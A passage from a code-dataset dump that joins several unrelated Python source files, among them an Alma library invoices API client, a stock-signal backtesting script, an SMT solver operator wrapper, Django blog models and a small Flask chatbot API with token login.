invoice.\n\n Creates an invoice in alma using the acquisitions/invoices API endpoint\n\n Args:\n invoice_json: a python dict representing an invoice object as described here\n - https://developers.exlibrisgroup.com/alma/apis/docs/xsd/rest_invoice.xsd/\n\n \"\"\"\n endpoint = \"acq/invoices\"\n result = requests.post(\n urljoin(self.base_url, endpoint),\n headers=self.headers,\n timeout=self.timeout,\n data=json.dumps(invoice_json),\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n\n def create_invoice_line(self, invoice_id: str, invoice_line_json: dict) -> dict:\n \"\"\"Create an invoice line for a given invoice Id.\n\n Args:\n invoice_id: the alma id number of an invoice\n invoice_line_json: a python dict representing an invoice object as described\n here: https://developers.exlibrisgroup.com/alma/apis/docs/xsd/\n rest_invoice_line.xsd/\n\n \"\"\"\n endpoint = f\"acq/invoices/{invoice_id}/lines\"\n result = requests.post(\n urljoin(self.base_url, endpoint),\n headers=self.headers,\n timeout=self.timeout,\n data=json.dumps(invoice_line_json),\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n\n def create_vendor(self, vendor_json: dict) -> dict:\n \"\"\"Create a vendor record.\n\n Args:\n vendor_json: a python dict representing an invoice object as described\n here: https://developers.exlibrisgroup.com/alma/apis/docs/xsd/rest_vendor.xsd/\n\n \"\"\"\n endpoint = \"acq/vendors\"\n result = requests.post(\n urljoin(self.base_url, endpoint),\n headers=self.headers,\n timeout=self.timeout,\n data=json.dumps(vendor_json),\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n\n def get_paged(\n self,\n endpoint: str,\n record_type: str,\n params: Optional[dict] = None,\n limit: int = 100,\n _offset: int = 0,\n _records_retrieved: int = 0,\n ) -> Generator[dict, None, None]:\n \"\"\"Retrieve paginated results from the Alma API for a given endpoint.\n\n Args:\n endpoint: The paged Alma API endpoint to call, e.g. \"acq/invoices\".\n record_type: The type of record returned by the Alma API for the specified\n endpoint, e.g. \"invoice\" record_type returned by the \"acq/invoices\"\n endpoint. See for example.\n params: Any endpoint-specific params to supply to the GET request.\n limit: The maximum number of records to retrieve per page. Valid values are\n 0-100.\n _offset: The offset value to supply to paged request. Should only be used\n internally by this method's recursion.\n _records_retrieved: The number of records retrieved so far for a given\n paged endpoint. Should only be used internally by this method's\n recursion.\n\n \"\"\"\n params = params or {}\n params[\"limit\"] = limit\n params[\"offset\"] = _offset\n response = requests.get(\n url=urljoin(self.base_url, endpoint),\n params=params,\n headers=self.headers,\n timeout=self.timeout,\n )\n response.raise_for_status()\n time.sleep(0.1)\n total_record_count = response.json()[\"total_record_count\"]\n records = response.json().get(record_type, [])\n records_retrieved = _records_retrieved + len(records)\n for record in records:\n yield record\n if records_retrieved < total_record_count:\n yield from self.get_paged(\n endpoint,\n record_type,\n params=params,\n limit=limit,\n _offset=_offset + limit,\n _records_retrieved=records_retrieved,\n )\n\n def get_fund_by_code(self, fund_code: str) -> dict:\n \"\"\"Get fund details using the fund code.\"\"\"\n endpoint = \"acq/funds\"\n params = {\"q\": f\"fund_code~{fund_code}\", \"view\": \"full\"}\n result = requests.get(\n urljoin(self.base_url, endpoint),\n headers=self.headers,\n params=params,\n timeout=self.timeout,\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n\n def get_invoices_by_status(self, status: str) -> Generator[dict, None, None]:\n \"\"\"Get all invoices with a provided status.\"\"\"\n invoice_params = {\n \"invoice_workflow_status\": status,\n }\n return self.get_paged(\"acq/invoices\", \"invoice\", params=invoice_params)\n\n def get_vendor_details(self, vendor_code: str) -> dict:\n \"\"\"Get vendor info from Alma.\"\"\"\n endpoint = f\"acq/vendors/{vendor_code}\"\n result = requests.get(\n url=urljoin(self.base_url, endpoint),\n headers=self.headers,\n timeout=self.timeout,\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n\n def get_vendor_invoices(self, vendor_code: str) -> Generator[dict, None, None]:\n \"\"\"Get invoices for a given vendor code.\"\"\"\n endpoint = f\"acq/vendors/{vendor_code}/invoices\"\n return self.get_paged(endpoint, \"invoice\")\n\n def mark_invoice_paid(\n self,\n invoice_id: str,\n payment_date: datetime,\n payment_amount: str,\n payment_currency: str,\n ) -> None:\n \"\"\"Mark an invoice as paid using the invoice process endpoint.\"\"\"\n endpoint = f\"acq/invoices/{invoice_id}\"\n params = {\"op\": \"paid\"}\n invoice_payment_data = {\n \"payment\": {\n \"voucher_date\": payment_date.strftime(\"%Y-%m-%dT12:00:00Z\"),\n \"voucher_amount\": payment_amount,\n \"voucher_currency\": {\"value\": payment_currency},\n }\n }\n result = requests.post(\n url=urljoin(self.base_url, endpoint),\n headers=self.headers,\n params=params,\n timeout=self.timeout,\n data=json.dumps(invoice_payment_data),\n )\n result.raise_for_status()\n time.sleep(0.1)\n if not result.json()[\"payment\"][\"payment_status\"][\"value\"] == \"PAID\":\n raise ValueError\n\n def process_invoice(self, invoice_id: str) -> dict:\n \"\"\"Move an invoice to in process using the invoice process endpoint.\"\"\"\n endpoint = f\"acq/invoices/{invoice_id}\"\n params = {\"op\": \"process_invoice\"}\n result = requests.post(\n urljoin(self.base_url, endpoint),\n headers=self.headers,\n params=params,\n timeout=self.timeout,\n data=\"{}\",\n )\n result.raise_for_status()\n time.sleep(0.1)\n return result.json()\n","repo_name":"MITLibraries/alma-sapinvoices","sub_path":"sapinvoices/alma.py","file_name":"alma.py","file_ext":"py","file_size_in_byte":8416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27213354263","text":"# -*-coding: utf-8 -*-\n# Python 3.6\n# Author:Zhang Haitao\n# Email:13163385579@163.com\n# TIME:2018-07-18 09:46\n# NAME:FT_hp-combine.py\nfrom singleFactor.compare_with_smoothed import find_best_smooth_period\nimport multiprocessing\nimport pickle\nfrom functools import partial\nimport matplotlib.pyplot as plt\nfrom backtest.main import quick\nfrom config import DIR_SIGNAL, DIR_SINGLE_BACKTEST, DIR_SIGNAL_SMOOTHED, \\\n DIR_SIGNAL_PARAMETER, DIR_TMP, DIR_SIGNAL_COMB\nimport os\nimport numpy as np\nimport pandas as pd\nfrom singleFactor.backtest_signal import SMOOTH_PERIODS, get_signal_direction, \\\n get_smoothed_signal\nfrom tools import outlier, z_score\n\nnames = os.listdir(os.path.join(DIR_SIGNAL_SMOOTHED, '0'))\nret_df = pd.DataFrame(index=names, columns=SMOOTH_PERIODS, dtype=float)\n\n\ndef traverse_one_sp(sp):\n fns=os.listdir(os.path.join(DIR_SIGNAL_SMOOTHED,str(sp)))\n get_sharpe=lambda fn:pd.read_csv(os.path.join(DIR_SIGNAL_SMOOTHED,str(sp),fn,'hedged_perf.csv'),index_col=0,header=None).loc['sharp_ratio'].values[0]\n return pd.Series([get_sharpe(fn) for fn in fns],index=fns)\n\ndef standardize_signal(signal):\n '''\n Args:\n signal:DataFrame, panel\n\n Returns:DataFrame, panel,the shape may be different with the input dataframe\n\n '''\n stk=signal.stack()\n stk=stk.groupby('trd_dt').apply(outlier)\n stk=stk.groupby('trd_dt').apply(z_score)\n return stk.unstack()\n\n\ndef select_with_sharpe(thresh=1.0):\n '''\n\n Args:\n thresh:least sharpe value to be selected\n\n Returns:DataFrame,with two columns,['sahrpe','sp']\n\n '''\n ss=multiprocessing.Pool(10).map(traverse_one_sp,SMOOTH_PERIODS)\n sharpe_info=pd.concat(ss,axis=1,keys=SMOOTH_PERIODS)\n\n # sharpe_info = pd.read_csv(os.path.join(DIR_SIGNAL_COMB, 'sharpe_info.csv'),\n # index_col=0)\n sp = sharpe_info[sharpe_info > thresh].idxmax(axis=1).sort_values().dropna()\n sharpe = sharpe_info.loc[sp.index].max(axis=1)\n result = pd.concat([sp, sharpe], axis=1, keys=['sp', 'sharpe']).sort_values(\n 'sp', ascending=False)\n\n result.to_csv(os.path.join(DIR_SIGNAL_COMB, 'selected_indicators.csv'))\n\n\n\n\ndef get_outer_frame(dflist):\n indsets=[set(df.index.tolist()) for df in dflist]\n colsets=[set(df.columns.tolist()) for df in dflist]\n indOuter=sorted(list(set.union(*indsets)))\n colOuter=sorted(list(set.union(*colsets)))\n return [df.reindex(index=indOuter,columns=colOuter) for df in dflist]\n\n\ndef get_mixed_signal():\n manually_selcted=pd.read_csv(os.path.join(DIR_SIGNAL_COMB,'manually_selected.csv'),index_col=0)\n manually_selcted=manually_selcted.dropna()\n\n for c in manually_selcted['manually_selected'].unique():\n subdf=manually_selcted[manually_selcted['manually_selected']==c]\n signals=[]\n for name,row in subdf.iterrows():\n sp=row['sp']\n signal=pd.read_pickle(os.path.join(DIR_SIGNAL,name+'.pkl'))*get_signal_direction(name)\n signal=standardize_signal(signal)#trick: standardize the signal before aggregation\n if sp:\n signal=get_smoothed_signal(signal,sp)\n # signal=signal.rolling(sp,min_periods=int(sp/2)).mean()\n # signals.append(signal.stack())\n signals.append(signal)\n print(c,name)\n\n signals=get_outer_frame(signals)\n #TODO: standardized before aggregation\n mixed=pd.DataFrame(np.nanmean([s.values for s in signals],axis=0),index=signals[0].index,columns=signals[0].columns)\n\n mixed.to_pickle(os.path.join(DIR_SIGNAL_COMB,'mixed_signal',c+'.pkl'))\n\n\n\ndef backtest_one(fn):\n name=fn[:-4]\n directory=os.path.join(DIR_SIGNAL_COMB,'combine',name)\n if not os.path.exists(directory):\n os.makedirs(directory)\n else:\n return\n\n signal=pd.read_pickle(os.path.join(DIR_SIGNAL_COMB,'mixed_signal',name+'.pkl'))\n results,fig=quick(signal,name,start='2010')\n fig.savefig(os.path.join(directory, name + '.png'))\n for k in results.keys():\n results[k].to_csv(os.path.join(directory, k + '.csv'))\n\n\ndef backtest_mixed_mixed(selected=True):\n fns=os.listdir(os.path.join(DIR_SIGNAL_COMB,'mixed_signal'))\n if selected:\n fns=[fn for fn in fns if fn[:-4] in ['C','Q','V']]\n name='cqv'\n else:\n name='mixed'\n signals=[]\n for fn in fns:\n signal=pd.read_pickle((os.path.join(DIR_SIGNAL_COMB,'mixed_signal',fn)))\n signal=standardize_signal(signal)\n signals.append(signal)\n print(fn)\n signals=get_outer_frame(signals)\n mixed = pd.DataFrame(np.nanmean([s.values for s in signals], axis=0),\n index=signals[0].index, columns=signals[0].columns)\n\n directory=os.path.join(DIR_SIGNAL_COMB,'combine',name)\n if not os.path.exists(directory):\n os.makedirs(directory)\n else:\n return\n\n results,fig=quick(mixed,name,start='2010')\n fig.savefig(os.path.join(directory, '{}.png'.format(name)))\n for k in results.keys():\n results[k].to_csv(os.path.join(directory, k + '.csv'))\n\n\nif __name__ == '__main__':\n # select_with_sharpe()\n\n # get_mixed_signal()\n # fns = os.listdir(os.path.join(DIR_SIGNAL_COMB, 'mixed_signal'))\n # multiprocessing.Pool(5).map(backtest_one,fns)\n\n backtest_mixed_mixed()\n","repo_name":"dxcv/FT","sub_path":"singleFactor/combine/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36313643092","text":"# This file is part of the smt-switch project.\n# See the file LICENSE in the top-level source directory for licensing information.\n\nimport sys\nimport enum\nfrom collections import OrderedDict, Sequence\nfrom functools import partial\nfrom ..util import namedtuple_with_defaults\n\n\nfdata = namedtuple_with_defaults('fdata', 'num_indices, min_arity, max_arity, custom')\n\n\n# special definitions for And/Or\n# this is just to support the And([]) --> True, Or([])-->False cases\ndef _And(*args):\n '''\n Custom and function defined for And([]) --> True, and And(x) --> x\n\n '''\n\n if len(args) == 0:\n return True\n\n elif len(args) == 1:\n return args[0]\n\n else:\n raise ValueError('Custom And should not be called with >= 2 args')\n\n\ndef _Or(*args):\n\n if len(args) == 0:\n return False\n\n elif len(args) == 1:\n return args[0]\n\n else:\n raise ValueError('Custom Or should not be called with >= 2 args')\n\n\n# Use strings here so that enums are automatically generated\n# if used enum here, would have to write function twice\n# once in enum and once to connect with data\n\n# make it an OrderedDict so that enum values are always the same\nfunc_symbols = OrderedDict([('And', fdata(0, 2, sys.maxsize, _And)),\n ('Or', fdata(0, 2, sys.maxsize, _Or)),\n ('Equals', fdata(0, 2, 2)),\n ('Not', fdata(0, 1, 1)),\n ('Ite', fdata(0, 3, 3)),\n ('Sub', fdata(0, 2, 2)),\n ('Add', fdata(0, 2, sys.maxsize)),\n ('LT', fdata(0, 2, 2)),\n ('GT', fdata(0, 2, 2)),\n ('LEQ', fdata(0, 2, 2)),\n ('GEQ', fdata(0, 2, 2)),\n ('Extract', fdata(2, 1, 1)),\n ('Concat', fdata(0, 2, 2)),\n ('ZeroExt', fdata(0, 2, 2)),\n ('BVAnd', fdata(0, 2, 2)),\n ('BVOr', fdata(0, 2, 2)),\n ('BVXor', fdata(0, 2, 2)),\n ('BVAdd', fdata(0, 2, 2)),\n ('BVSub', fdata(0, 2, 2)),\n ('BVMul', fdata(0, 2, 2)),\n ('BVUdiv', fdata(0, 2, 2)),\n ('BVUrem', fdata(0, 2, 2)),\n ('BVShl', fdata(0, 2, 2)),\n ('BVAshr', fdata(0, 2, 2)),\n ('BVLshr', fdata(0, 2, 2)),\n ('BVUlt', fdata(0, 2, 2)),\n ('BVUle', fdata(0, 2, 2)),\n ('BVUgt', fdata(0, 2, 2)),\n ('BVUge', fdata(0, 2, 2)),\n ('BVSlt', fdata(0, 2, 2)),\n ('BVSle', fdata(0, 2, 2)),\n ('BVSgt', fdata(0, 2, 2)),\n ('BVSge', fdata(0, 2, 2)),\n ('BVNot', fdata(0, 1, 1)),\n ('BVNeg', fdata(0, 1, 1)),\n ('Select', fdata(0, 2, 2)),\n ('Store', fdata(0, 3, 3)),\n ('No_op', fdata(0, 0, 0)),\n ('_ApplyUF', fdata(0, 1, sys.maxsize)),\n ('Distinct', fdata(0, 2, sys.maxsize))])\n\n\n# generate enums for each of these function symbols\nfunc_d = dict()\n\nfor fname, i in zip(func_symbols.keys(), range(0, len(func_symbols))):\n func_d[fname] = i\n\nfunc_enum = enum.Enum('func_enum', func_d)\n\n# to make it iterable\nfunc_enum.__order__ = func_symbols.keys()\n\n\nclass operator:\n '''\n Class that wraps all functions, builtin or defined.\n\n Allows for partial evaluations\n\n _gen_operator ensures that the partial evaluations are only for the number\n of indexes in an indexed operator (normal operators have num_index == 0)\n\n e.g. bvult can not be partially evaluated except with 0 arguments (because it is not indexed)\n on the other hand, extract can be partially evaluated with it's high and low bits\n\n ex4_2 = functions.extract(4, 2)\n ex4_2(bv)\n\n is equivalent to:\n\n functions.extract(4, 2, bv)\n\n ex4_2 == functions.extract(4, 2) will return True\n '''\n\n def __init__(self, smt, func_info, fdata, *args, **kwargs):\n self._smt = smt\n self._f_imp = None\n \n if issubclass(func_info.__class__, enum.Enum):\n self._fname = func_info.name\n self._f_id = func_info\n self._f_type = \"builtin\"\n elif isinstance(func_info, tuple):\n assert len(func_info) in {2, 3}, \\\n \"Expecting function to be (name, solver object) \" + \\\n \"with a third parameter for the implementation if \" + \\\n \"it's a define-fun macros\"\n self._fname = func_info[0]\n self._f_id = func_info[1]\n self._f_type = \"uf\"\n if len(func_info) == 3:\n self._f_imp = func_info[2]\n self._f_type = \"macro\"\n self._fdata = fdata\n self._args = args\n self._keywords = kwargs\n\n def __eq__(self, other):\n return self._fname == other._fname and self._args == other._args \\\n and self._keywords == other._keywords\n\n def __ne__(self, other):\n return self._fname != other._fname or self._args != other._args \\\n or self._keywords != other._keywords\n\n @property\n def fname(self):\n return self._fname\n\n @property\n def f_id(self):\n return self._f_id\n\n @property\n def f_type(self):\n return self._f_type\n\n @property\n def args(self):\n return self._args\n\n @property\n def keywords(self):\n return self._p.keywords\n\n def __repr__(self):\n return ''.format(self._fname, self._args, self._keywords)\n\n def __call__(self, *args, **kwargs):\n if args and isinstance(args[0], Sequence):\n args = args[0]\n\n if len(self._args) == 0 and len(args) == self._fdata.num_indices:\n\n # check for custom behavior\n if self._fdata.num_indices == 0 and self._fdata.custom and not self._smt.strict:\n return self._fdata.custom(*args)\n\n else:\n return operator(self._smt, self._f_id, self._fdata, *args, **kwargs)\n\n elif len(self._args) == self._fdata.num_indices and len(args) >= self._fdata.min_arity:\n if self._smt.strict and len(args) > self._fdata.max_arity:\n raise ValueError('In strict mode and received {} args when max arity = '\n .format(len(args), fdata.max_arity))\n\n return self._smt.ApplyFun(self, *args, **kwargs)\n\n elif len(args) >= self._fdata.num_indices + self._fdata.min_arity:\n if self._smt.strict and len(args) - self._fdata.num_indices > self._fdata.max_arity:\n raise ValueError('In strict mode and received {} function indices and' +\n ' {} args when max arity = '\n .format(self._fdata.num_indices,\n len(args) - self._fdata.num_indices, fdata.max_arity))\n\n # always pass an operator with the minumum number of arguments\n # this is for CVC4 to construct the function\n op = operator(self._smt, self._f_id, self._fdata,\n *args[:self._fdata.num_indices])\n\n args = args[self._fdata.num_indices:]\n\n return self._smt.ApplyFun(op, *args, **kwargs)\n\n else:\n # check for custom behaviour\n if self._fdata.custom and not self._smt.strict:\n return self._fdata.custom(*args, **kwargs)\n\n elif fdata.num_indices == 0:\n # non-indexed operator\n raise ValueError('Expected {} inputs to operator but received {}'\n .format(fdata.min_arity, len(args)))\n else:\n raise ValueError('Undefined behaviour for {}{}'\n .format(self, args))\n\n def __hash__(self):\n return (self._fname, self._args).__hash__()\n","repo_name":"makaimann/py-smt-switch","sub_path":"smt_switch/src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":8400,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"74116391871","text":"import unittest\nfrom src.helpers import *\nfrom src.core.tree import *\n\n\nclass TreeToAsciiTests(unittest.TestCase):\n def test_tree_to_ascii(self):\n test = \"\"\" ┌─ 2 \n │ \n─┼─ 3 \n │ \n └─ 4 \"\"\"\n tree = TreeNode(name=\"1\")\n child1 = TreeNode(name=\"2\")\n child2 = TreeNode(name=\"3\")\n child3 = TreeNode(name=\"4\")\n tree.add_child(child1)\n tree.add_child(child2)\n tree.add_child(child3)\n\n self.assertEqual(tree.__str__(), test)","repo_name":"AaronVr/phylo_trees","sub_path":"tests/helpers/tree_to_ascii_tests.py","file_name":"tree_to_ascii_tests.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18159136995","text":"def solution(prices):\n length = len(prices)\n answer = [0] * length\n stack = []\n arr = []\n for x, i in enumerate(prices):\n arr.append([x, i])\n\n i = 0\n while i < length:\n x = arr[i]\n if len(stack) == 0:\n stack.append(x)\n i += 1\n else:\n # 스택의 맨 위 원소가 비교하고자 하는 원소보다 높을 때\n if stack[-1][1] > x[1]:\n idx = stack[-1][0]\n answer[idx] = x[0] - idx\n stack.pop()\n else:\n stack.append(x)\n i += 1\n # print(stack)\n\n while len(stack) != 0:\n x = stack[-1]\n answer[x[0]] = length - x[0] -1\n stack.pop()\n\n return answer\n\n\nprint(solution([1, 2, 3, 2, 3]))\n","repo_name":"Kyun2da/Algorithm","sub_path":"python/programmers/level2/주식가격.py","file_name":"주식가격.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"44592863155","text":"from rlf.storage.transition_storage import TransitionStorage\nimport torch\nimport rlf.rl.utils as rutils\nimport numpy as np\n\ndef create_her_storage_buff(obs_space, action_space, buff_size, args):\n return HerStorage(obs_space, action_space, buff_size, args)\n\nclass HerStorage(TransitionStorage):\n \"\"\"\n Uses the \"final\" HER strategy which uses the state achieved at the end of\n the trajectory.\n Observation should have format:\n {\n \"achieved_goal\": tensor\n \"desired_goal\": tensor\n \"observation\": tensor\n }\n Arguments are in `OffPolicy`\n \"\"\"\n\n def _on_traj_done(self, done_trajs):\n for done_traj in done_trajs:\n for t in range(len(done_traj) - 1):\n state = done_traj[t][0].copy()\n next_state = done_traj[t+1][0].copy()\n\n if t == 0:\n mask = 1.0\n else:\n mask = done_traj[t-1][2]\n\n def push_trans(state, next_state):\n if torch.allclose(next_state['desired_goal'],\n next_state['achieved_goal'], 0.0001):\n reward = 1.0\n next_mask = 0.0\n else:\n reward = done_traj[t][4]\n next_mask = done_traj[t][2]\n\n self._push_transition({\n 'action': done_traj[t][1],\n 'state': state,\n 'mask': torch.tensor([mask]),\n 'hxs': {},\n 'reward': torch.tensor([reward]),\n 'next_state': next_state,\n 'next_mask': torch.tensor([next_mask]),\n 'next_hxs': {},\n })\n\n # Augment with the HER style goal.\n if self.args.her_strat == 'future':\n for k in range(self.args.her_K):\n # Randomly choose a time step in the future.\n future_t = np.random.randint(t, len(done_traj) - 1)\n future_goal = done_traj[future_t+1][0]['achieved_goal']\n\n state['desired_goal'] = future_goal\n next_state['desired_goal'] = future_goal\n push_trans(state, next_state)\n elif self.args.her_strat == 'final':\n final_goal = done_traj[-1][0]['achieved_goal']\n state['desired_goal'] = final_goal\n next_state['desired_goal'] = final_goal\n push_trans(state, next_state)\n else:\n raise ValueError(f\"Invalid HER strategy {self.args.her_strat}\")\n","repo_name":"clvrai/goal_prox_il","sub_path":"rl-toolkit/rlf/algos/off_policy/her.py","file_name":"her.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"60"} +{"seq_id":"21341861676","text":"from django.db import models\n\n\nclass Category(models.Model):\n title = models.CharField(\n max_length=120,\n verbose_name='Название'\n )\n code = models.CharField(\n max_length=120,\n verbose_name='Код'\n )\n\n @property\n def count(self):\n return self.blog_set.count()\n\n def __str__(self):\n return self.title\n\n\nclass Blog(models.Model):\n title = models.CharField(\n max_length=120,\n verbose_name='Название'\n )\n image = models.ImageField(\n verbose_name='Картинка'\n )\n upload_date = models.DateField(\n auto_created=True\n )\n categories = models.ManyToManyField(\n Category, verbose_name=\"Категории\"\n )\n description = models.TextField(\n verbose_name='Описание'\n )\n text = models.TextField(\n verbose_name='Текст'\n )\n\n @property\n def category_list(self):\n return self.categories.all()\n\n def __str__(self):\n return self.title\n","repo_name":"moddyngway/build-course","sub_path":"blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27405202376","text":"def arithmetic_arranger(problems, show = False):\n if len(problems) > 5:\n return \"Error: Too many problems.\"\n else:\n first_line = \"\"\n second_line = \"\"\n dash_line = \"\"\n answer_line = \"\"\n\n for i in problems:\n items = i.split()\n num_1 = items[0]\n num_2 = items[-1]\n symbol = items[1]\n\n width = max(len(num_1), len(num_2)) + 2\n\n if not num_1.isdigit() or not num_2.isdigit():\n return \"Error: Numbers must only contain digits.\"\n\n else:\n if symbol == \"+\":\n answer = int(num_1) + int(num_2)\n elif symbol == \"-\":\n answer = int(num_1) - int(num_2)\n else:\n return \"Error: Operator must be '+' or '-'.\"\n\n if len(num_1) > 4 or len(num_2) > 4:\n return \"Error: Numbers cannot be more than four digits.\"\n\n first_line += str(num_1).rjust(width)\n second_line += symbol + str(num_2).rjust(width - 1)\n dash_line += \"-\" * width\n answer_line += str(answer).rjust(width)\n\n if len(problems) >= 1:\n first_line += \" \"\n second_line += \" \"\n dash_line += \" \"\n answer_line += \" \"\n \n\n if show == True:\n arranged_problems = (first_line.rstrip() + \"\\n\" + second_line.rstrip() + \"\\n\" + dash_line.rstrip() + \"\\n\" + answer_line.rstrip())\n else:\n arranged_problems = (first_line.rstrip() + \"\\n\" + second_line.rstrip() + \"\\n\" + dash_line.rstrip())\n\n return arranged_problems","repo_name":"tcun/freeCodeCamp-Projects","sub_path":"arithmetic_arranger.py","file_name":"arithmetic_arranger.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15981608968","text":"from django.core.urlresolvers import reverse\nfrom django.template import Library, defaulttags\n__author__ = 'zz'\n\nregister = Library()\n\n\n@register.inclusion_tag('includes/render_next_or_previous_blog.html', takes_context=True)\ndef next_or_previous_blog(context, obj):\n has_previous = False\n has_next = False\n\n next_blog = obj.get_next_object()\n previous_blog = obj.get_previous_object()\n\n if next_blog:\n has_next = True\n\n if previous_blog:\n has_previous = True\n\n return {\n 'next_blog': next_blog,\n 'previous_blog': previous_blog,\n 'has_next': has_next,\n 'has_previous': has_previous\n }\n\n\n@register.simple_tag(takes_context=True)\ndef simple_url(context, obj, *args, **kwargs):\n \"\"\"\n :param obj: the url name same as the {% url %}\n :return: if the is no ':' in the viewname, the function will add the current_ns from the context.\n \"\"\"\n ns = context.get('current_ns')\n\n if ns and (':' not in obj):\n obj = ':'.join((ns, obj))\n\n return reverse(obj, args=args, kwargs=kwargs)\n\n\n@register.inclusion_tag('includes/month_links_snippet.html', takes_context=True)\ndef month_links(context):\n model = context.get('model')\n if not model:\n return None\n\n context.update({\n 'dates': model.objects.publish().datetimes('publish_date', 'month')\n\n })\n return context\n\n\n@register.inclusion_tag('includes/filter_info.html', takes_context=True)\ndef filter_info(context):\n tag = context.get('tag')\n category = context.get('category')\n year = context.get('year')\n month = context.get('month')\n\n if year:\n year = year.strftime('%Y')\n\n if month:\n month = month.strftime('%Y-%m')\n\n ret = {\n 'tag': tag,\n 'category': category,\n 'year': year,\n 'month': month\n }\n\n ret['has_filter'] = any(ret.values())\n return ret","repo_name":"littlezz/blog-project","sub_path":"core/templatetags/blog_tag.py","file_name":"blog_tag.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30925761487","text":"#!flask/bin/python\nimport os\nimport json\nimport string\nimport hashlib\nimport time\nfrom flask import Flask, jsonify, abort, make_response, request, url_for, render_template, json, g\nfrom flask_httpauth import HTTPBasicAuth, HTTPTokenAuth\nfrom random import *\n\n\napp = Flask(__name__, template_folder=\".\")\nauth = HTTPBasicAuth()\nauthToken = HTTPTokenAuth(scheme='Token')\n\n\n@auth.get_password\ndef get_password(username):\n if username == 'miguel':\n return 'python'\n return None\n\n\n@auth.error_handler\ndef unauthorized():\n return make_response(jsonify({'error': 'Unauthorized access'}), 403)\n\n\n@app.errorhandler(400)\ndef not_found(error):\n return make_response(jsonify( { 'error': 'Bad request' } ), 400)\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\ntoken_manager = [\n {\n \"str_token\": \"4231cb9ab06c4d4c3a8c7a3790bb3f98\"\n }\n]\n\nmessage = {\n \"text\": \"hi !\"\n}\n\nerreurType = {\n \"error\": \"not a valid type\"\n}\n\nbye = {\n \"text\" : \"See ya soon !\"\n}\n\n\n@app.route('/login', methods = ['POST'])\ndef get_login():\n token = hashlib.md5()\n token.update(str(time.time()))\n t = token.hexdigest()\n object = {}\n object[\"str_token\"] = t\n token_manager.append(object)\n return json.dumps(object)\n\n\n@authToken.verify_token\ndef verify_token(token):\n for t in token_manager:\n if \"str_token\" in t and t[\"str_token\"] == token:\n return True\n return False\n\n\n@app.route('/actions', methods=['POST'])\n@authToken.login_required\ndef actions():\n tab = []\n with open(\"bouton.json\", \"r\") as file:\n user_data = json.load(file)\n if request.json[\"type\"] == \"message\":\n if request.json[\"text\"] == \"hello\":\n data = user_data[\"boutons\"][\"bouton_menu\"]\n return json.dumps(data)\n else:\n return json.dumps(message)\n\n elif request.json[\"type\"] == \"button_tap\" and request.json[\"payload\"] :\n\n id = request.json[\"payload\"][\"button_id\"]\n for j in user_data[\"boutons\"]:\n if \"parent_id\" in user_data[\"boutons\"][j] and user_data[\"boutons\"][j][\"parent_id\"] == id:\n tab.append(user_data[\"boutons\"][j])\n if not tab:\n return json.dumps(bye)\n return json.dumps(tab)\n\n else:\n\n return json.dumps(erreurType)\n\n\n# tasks = [\n# {\n# 'id': 1,\n# 'title': u'Buy groceries',\n# 'description': u'Milk, Cheese, Pizza, Fruit, Tylenol',\n# 'done': False\n# },\n# {\n# 'id': 2,\n# 'title': u'Learn Python',\n# 'description': u'Need to find a good Python tutorial on the web',\n# 'done': False\n# }\n# ]\n# \n# \n# def get_token():\n# min_char = 8\n# max_char = 12\n# allchar = string.ascii_letters + string.punctuation + string.digits\n# token = \"\".join(choice(allchar) for x in range(randint(min_char, max_char)))\n# tokenJson = {\"token\": token}\n# return tokenJson\n#\n#\n# def make_public_task(task):\n# new_task = {}\n# for field in task:\n# if field == 'id':\n# new_task['uri'] = url_for('get_task', task_id = task['id'], _external = True)\n# else:\n# new_task[field] = task[field]\n# return new_task\n#\n#\n# @app.route('/', methods = ['GET'])\n# def index(page_name):\n# if os.path.isfile(page_name):\n# return render_template(\"%s\" % page_name)\n# else:\n# return render_template(\"error.html\")\n#\n#\n# @app.route('/todo/api/v1.0/tasks', methods=['GET'])\n# @auth.login_required\n# def get_tasks():\n# return jsonify({'tasks': map(make_public_task, tasks)})\n#\n#\n# @app.route('/todo/api/v1.0/tasks/', methods = ['GET'])\n# @auth.login_required\n# def get_task(task_id):\n# task = filter(lambda t: t['id'] == task_id, tasks)\n# if len(task) == 0:\n# abort(404)\n# return jsonify( { 'task': make_public_task(task[0]) } )\n#\n#\n# @app.route('/todo/api/v1.0/tasks', methods = ['POST'])\n# @auth.login_required\n# def create_task():\n# if not request.json or not 'title' in request.json:\n# abort(400)\n# task = {\n# 'id': tasks[-1]['id'] + 1,\n# 'title': request.json['title'],\n# 'description': request.json.get('description', \"\"),\n# 'done': False\n# }\n# tasks.append(task)\n# return jsonify( { 'task': make_public_task(task) } ), 201\n#\n#\n# @app.route('/todo/api/v1.0/tasks/', methods = ['PUT'])\n# @auth.login_required\n# def update_task(task_id):\n# task = filter(lambda t: t['id'] == task_id, tasks)\n# if len(task) == 0:\n# 